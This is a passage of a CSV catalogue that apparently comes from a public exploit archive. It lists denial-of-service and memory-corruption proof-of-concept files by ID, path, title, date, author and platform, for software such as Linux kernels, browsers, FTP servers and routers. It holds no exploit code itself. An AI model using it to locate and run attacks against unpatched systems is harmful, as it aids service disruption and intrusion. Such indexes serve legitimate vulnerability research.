Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos, -24854,exploits/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local/Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos, -24770,exploits/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,windows,dos, -24775,exploits/windows/dos/24775.html,"Microsoft Internet Explorer 6 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos, -24776,exploits/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos, -24777,exploits/linux/dos/24777.txt,"Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure",2004-11-25,"Florian Heinz",linux,dos, -24778,exploits/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification",2004-11-25,"Peter Greenwood",multiple,dos, -24780,exploits/osx/dos/24780.html,"Apple Safari Web Browser 1.x - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",osx,dos, -24781,exploits/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",multiple,dos, -24812,exploits/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash (PoC)",2013-03-15,metacom,windows,dos, -24788,exploits/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash (PoC)",2013-03-15,"John Cobb",windows,dos, -24793,exploits/multiple/dos/24793.txt,"JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",multiple,dos, -24799,exploits/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service",2004-12-06,"Niek van der Maas",multiple,dos, -24804,exploits/linux/dos/24804.c,"Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service",2004-12-07,"Darrick J. Wong",linux,dos, -24805,exploits/multiple/dos/24805.txt,"MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",multiple,dos, -24807,exploits/multiple/dos/24807.txt,"MD5 - Message Digest Algorithm Hash Collision",2004-12-07,"Dan Kaminsky",multiple,dos, -24809,exploits/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,multiple,dos, -24815,exploits/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",linux,dos, -24818,exploits/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",multiple,dos, -24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos, -24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",hardware,dos, -24841,exploits/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String",2004-12-14,"Greg MacManus",windows,dos, -24843,exploits/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,osx,dos, -24855,exploits/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local/Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos, -24865,exploits/linux/dos/24865.txt,"GnuTLS libgnutls - Double-Free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos, -24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos, -24880,exploits/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos, -24896,exploits/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos, -24917,exploits/windows/dos/24917.py,"Easy DVD Player 3.5.1 - libav 'libavcodec_plugin.dll' Denial of Service",2013-04-05,metacom,windows,dos, -24918,exploits/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos, -24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",windows,dos, -24930,exploits/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos, -27433,exploits/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",windows,dos, -24968,exploits/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,windows,dos,514 -24951,exploits/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos, -24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,windows,dos,69 -24962,exploits/windows/dos/24962.txt,"Foxit Reader 5.4.3.x < 5.4.5.0124 - PDF XREF Parsing Denial of Service",2013-04-18,FuzzMyApp,windows,dos, -24966,exploits/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos, -24972,exploits/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String",2013-04-22,Kurono,windows,dos, -25004,exploits/linux/dos/25004.txt,"QwikMail 0.3 - HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,dos, -25007,exploits/windows/dos/25007.txt,"Convex 3D 0.8 - Buffer Overflow",2004-12-16,"Ariel Berkman",windows,dos, -25012,exploits/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service",2004-12-11,"Bartlomiej Sieka",windows,dos, -25017,exploits/linux/dos/25017.txt,"UML_Utilities User-Mode Linux - uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",linux,dos, -25046,exploits/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos, -25047,exploits/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos, -25056,exploits/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos, -25061,exploits/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos, -25063,exploits/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos, -25070,exploits/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos, -25075,exploits/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos, -25076,exploits/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos, -25077,exploits/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos, -25081,exploits/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos, -25082,exploits/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Denial of Service",2005-02-03,"laurent oudot",hardware,dos, -25083,exploits/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos, -25085,exploits/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos, -25107,exploits/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos, -25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,hardware,dos, -25128,exploits/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos, -25135,exploits/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - 'Date' Cross-Site Scripting",2013-05-01,demonalex,windows,dos, -25140,exploits/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos, -25164,exploits/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos, -25165,exploits/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos, -25171,exploits/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos, -40819,exploits/linux/dos/40819.c,"Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos, -40820,exploits/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos, -25218,exploits/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service Vulnerabilities",2005-03-05,ports,windows,dos, -25219,exploits/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos, -25231,exploits/windows/dos/25231.txt,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos, -25234,exploits/linux/dos/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos, -25255,exploits/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos, -25259,exploits/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos, -25268,exploits/windows/dos/25268.txt,"Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos, -25277,exploits/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos, -25281,exploits/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos, -25287,exploits/linux/dos/25287.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",linux,dos, -25295,exploits/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos, -25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos, -25322,exploits/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos, -25326,exploits/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos, -25329,exploits/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos, -25334,exploits/linux/dos/25334.txt,"Mozilla Suite/Firefox - JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos, -25353,exploits/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service",2005-04-06,anonymous,unix,dos, -25363,exploits/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,windows,dos, -25364,exploits/windows/dos/25364.txt,"AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos, -25383,exploits/windows/dos/25383.pl,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos, -25387,exploits/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service",2005-04-12,"Fernando Gont",multiple,dos, -25388,exploits/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service",2005-04-12,"Fernando Gont",multiple,dos, -25389,exploits/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - Denial of Service",2005-04-12,"Fernando Gont",multiple,dos, -25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",multiple,dos, -25402,exploits/hardware/dos/25402.txt,"LG U8120 Mobile Phone - '.MIDI' File Remote Denial of Service",2005-04-13,"Luca Ercoli",hardware,dos, -25408,exploits/windows/dos/25408.pl,"Microsoft Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,windows,dos, -25418,exploits/windows/dos/25418.py,"MiniWeb HTTP Server 300 - Crash (PoC)",2013-05-13,dmnt,windows,dos, -25429,exploits/linux/dos/25429.c,"Libsafe 2.0 - Multi-threaded Process Race Condition Security Bypass",2005-04-15,Overflow.pl,linux,dos, -25439,exploits/multiple/dos/25439.c,"Multiple Vendor - TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos, -25443,exploits/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,windows,dos, -25465,exploits/linux/dos/25465.txt,"Logwatch 2.6 Secure Script - Denial of Service",2005-04-20,anonymous,linux,dos, -25470,exploits/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos, -25472,exploits/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos, -25499,exploits/linux/dos/25499.py,"Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC)",2013-05-17,"Mert SARICA",linux,dos, -25525,exploits/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (1)",2005-04-25,kf,linux,dos, -25527,exploits/linux/dos/25527.txt,"ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos, -25584,exploits/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 - Memory Corruption",2005-05-02,"Luigi Auriemma",multiple,dos, -25611,exploits/windows/dos/25611.txt,"Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos, -25629,exploits/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos, -25631,exploits/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos, -25633,exploits/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,windows,dos, -25647,exploits/linux/dos/25647.sh,"Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow",2005-05-11,"Paul Starzetz",linux,dos, -25658,exploits/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 - URL Handler Remote Denial of Service",2005-05-13,"Torseq Tech",windows,dos, -25680,exploits/windows/dos/25680.txt,"War Times - Remote Game Server Denial of Service",2005-05-17,"Luigi Auriemma",windows,dos, -25692,exploits/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service",2005-05-23,"Luigi Auriemma",multiple,dos, -25699,exploits/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 - Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",windows,dos, -25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos, -25712,exploits/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,windows,dos, -25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow",2013-05-26,LiquidWorm,windows,dos, -25719,exploits/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos, -25736,exploits/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos, -25737,exploits/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,windows,dos, -25752,exploits/php/dos/25752.txt,"PHPMailer 1.7 - 'Data()' Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos, -25757,exploits/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos, -25782,exploits/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos, -25791,exploits/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos, -25807,exploits/aix/dos/25807.txt,"IBM AIX 5.x - 'Invscout' Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos, -25809,exploits/osx/dos/25809.py,"CodeBlocks 12.11 (OSX) - Crash (PoC)",2013-05-29,ariarat,osx,dos, -25837,exploits/linux/dos/25837.txt,"Monkey HTTPd 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos, -26292,exploits/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS - Denial of Service",2005-08-22,"Mella Marco",osx,dos, -25852,exploits/multiple/dos/25852.py,"ModSecurity - Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos, -25911,exploits/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service",2005-06-28,fRoGGz,windows,dos, -25921,exploits/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 - Ignore Command Remote Denial of Service",2005-06-29,"Luigi Auriemma",windows,dos, -25936,exploits/windows/dos/25936.pl,"PlanetDNS PlanetFileServer - Remote Buffer Overflow",2005-06-28,fRoGGz,windows,dos, -25943,exploits/linux/dos/25943.txt,"OFTPD 0.3.x - User Command Buffer Overflow",2005-07-06,new.security@gmail.com,linux,dos, -25962,exploits/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 - RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",asp,dos, -25967,exploits/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos, -25972,exploits/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos, -25974,exploits/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos, -25991,exploits/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos, -25992,exploits/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos, -26005,exploits/windows/dos/26005.pl,"Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow",2005-07-19,kcope,windows,dos, -26010,exploits/windows/dos/26010.py,"Quick TFTP Server Pro 2.2 - Denial of Service",2013-06-07,npn,windows,dos, -26076,exploits/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos, -26128,exploits/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos, -26130,exploits/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos, -26133,exploits/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 -26137,exploits/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash (PoC)",2013-06-12,npn,windows,dos, -26138,exploits/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",hardware,dos,554 -26139,exploits/windows/dos/26139.txt,"Gaim AIM/ICQ Protocols - Multiple Vulnerabilities",2005-08-10,"Brandon Perry",windows,dos, -26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",multiple,dos, -26173,exploits/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos, -26194,exploits/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos, -26214,exploits/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow",2013-06-14,ariarat,windows,dos, -26216,exploits/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow",2005-08-31,ViPeR,windows,dos, -26219,exploits/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service",2005-09-02,"Critical Security",windows,dos, -26220,exploits/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key",2005-09-02,m123303@richmond.ac.uk,windows,dos, -26233,exploits/hardware/dos/26233.txt,"Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow",2005-09-07,Markus,hardware,dos, -26248,exploits/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service",2005-09-09,anonymous,linux,dos, -26249,exploits/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos, -26251,exploits/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos, -26271,exploits/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos, -26301,exploits/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos, -26331,exploits/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus - TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos, -26322,exploits/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,windows,dos, -26325,exploits/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - iFrame Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos, -26336,exploits/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos, -26340,exploits/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos, -26341,exploits/windows/dos/26341.txt,"Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos, -26342,exploits/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos, -26382,exploits/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos, -26413,exploits/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos, -26450,exploits/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service (1)",2013-06-26,Chako,windows,dos,21 -26457,exploits/windows/dos/26457.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos, -26489,exploits/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",linux,dos, -26517,exploits/windows/dos/26517.txt,"Microsoft PowerPoint 2007 - Crash (PoC)",2013-07-01,Asesino04,windows,dos, -26519,exploits/windows/dos/26519.py,"AVS Media Player 4.1.11.100 - '.ac3' Denial of Service",2013-07-01,metacom,windows,dos, -26526,exploits/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos, -26548,exploits/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos, -26555,exploits/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos, -26557,exploits/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos, -26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos, -26575,exploits/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",windows,dos, -26578,exploits/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,windows,dos, -26601,exploits/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos, -26648,exploits/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",linux,dos, -26665,exploits/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos, -26666,exploits/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos, -26690,exploits/windows/dos/26690.c,"Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos, -26710,exploits/multiple/dos/26710.txt,"Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos, -26733,exploits/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos, -26749,exploits/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service",2005-12-29,"J. Bruce Fields",linux,dos, -26754,exploits/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos, -26762,exploits/multiple/dos/26762.html,"Mozilla Firefox 0.x/1.x - Large History File Buffer Overflow",2005-12-08,ZIPLOCK,multiple,dos, -26769,exploits/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos, -26776,exploits/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow",2005-12-12,dr_insane,windows,dos, -26779,exploits/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,windows,dos, -26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos, -26811,exploits/linux/dos/26811.c,"Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow",2005-12-13,"Oleg Drokin",linux,dos, -26816,exploits/windows/dos/26816.pl,"AppServ Open Project 2.5.3 - Remote Denial of Service",2005-12-14,Rozor,windows,dos, -26825,exploits/hardware/dos/26825.txt,"Linksys Routers - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos, -26833,exploits/hardware/dos/26833.txt,"Cisco Catalyst Switches (Multiple Devices) - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos, -26834,exploits/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos, -26835,exploits/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos, -26869,exploits/windows/dos/26869.txt,"Microsoft 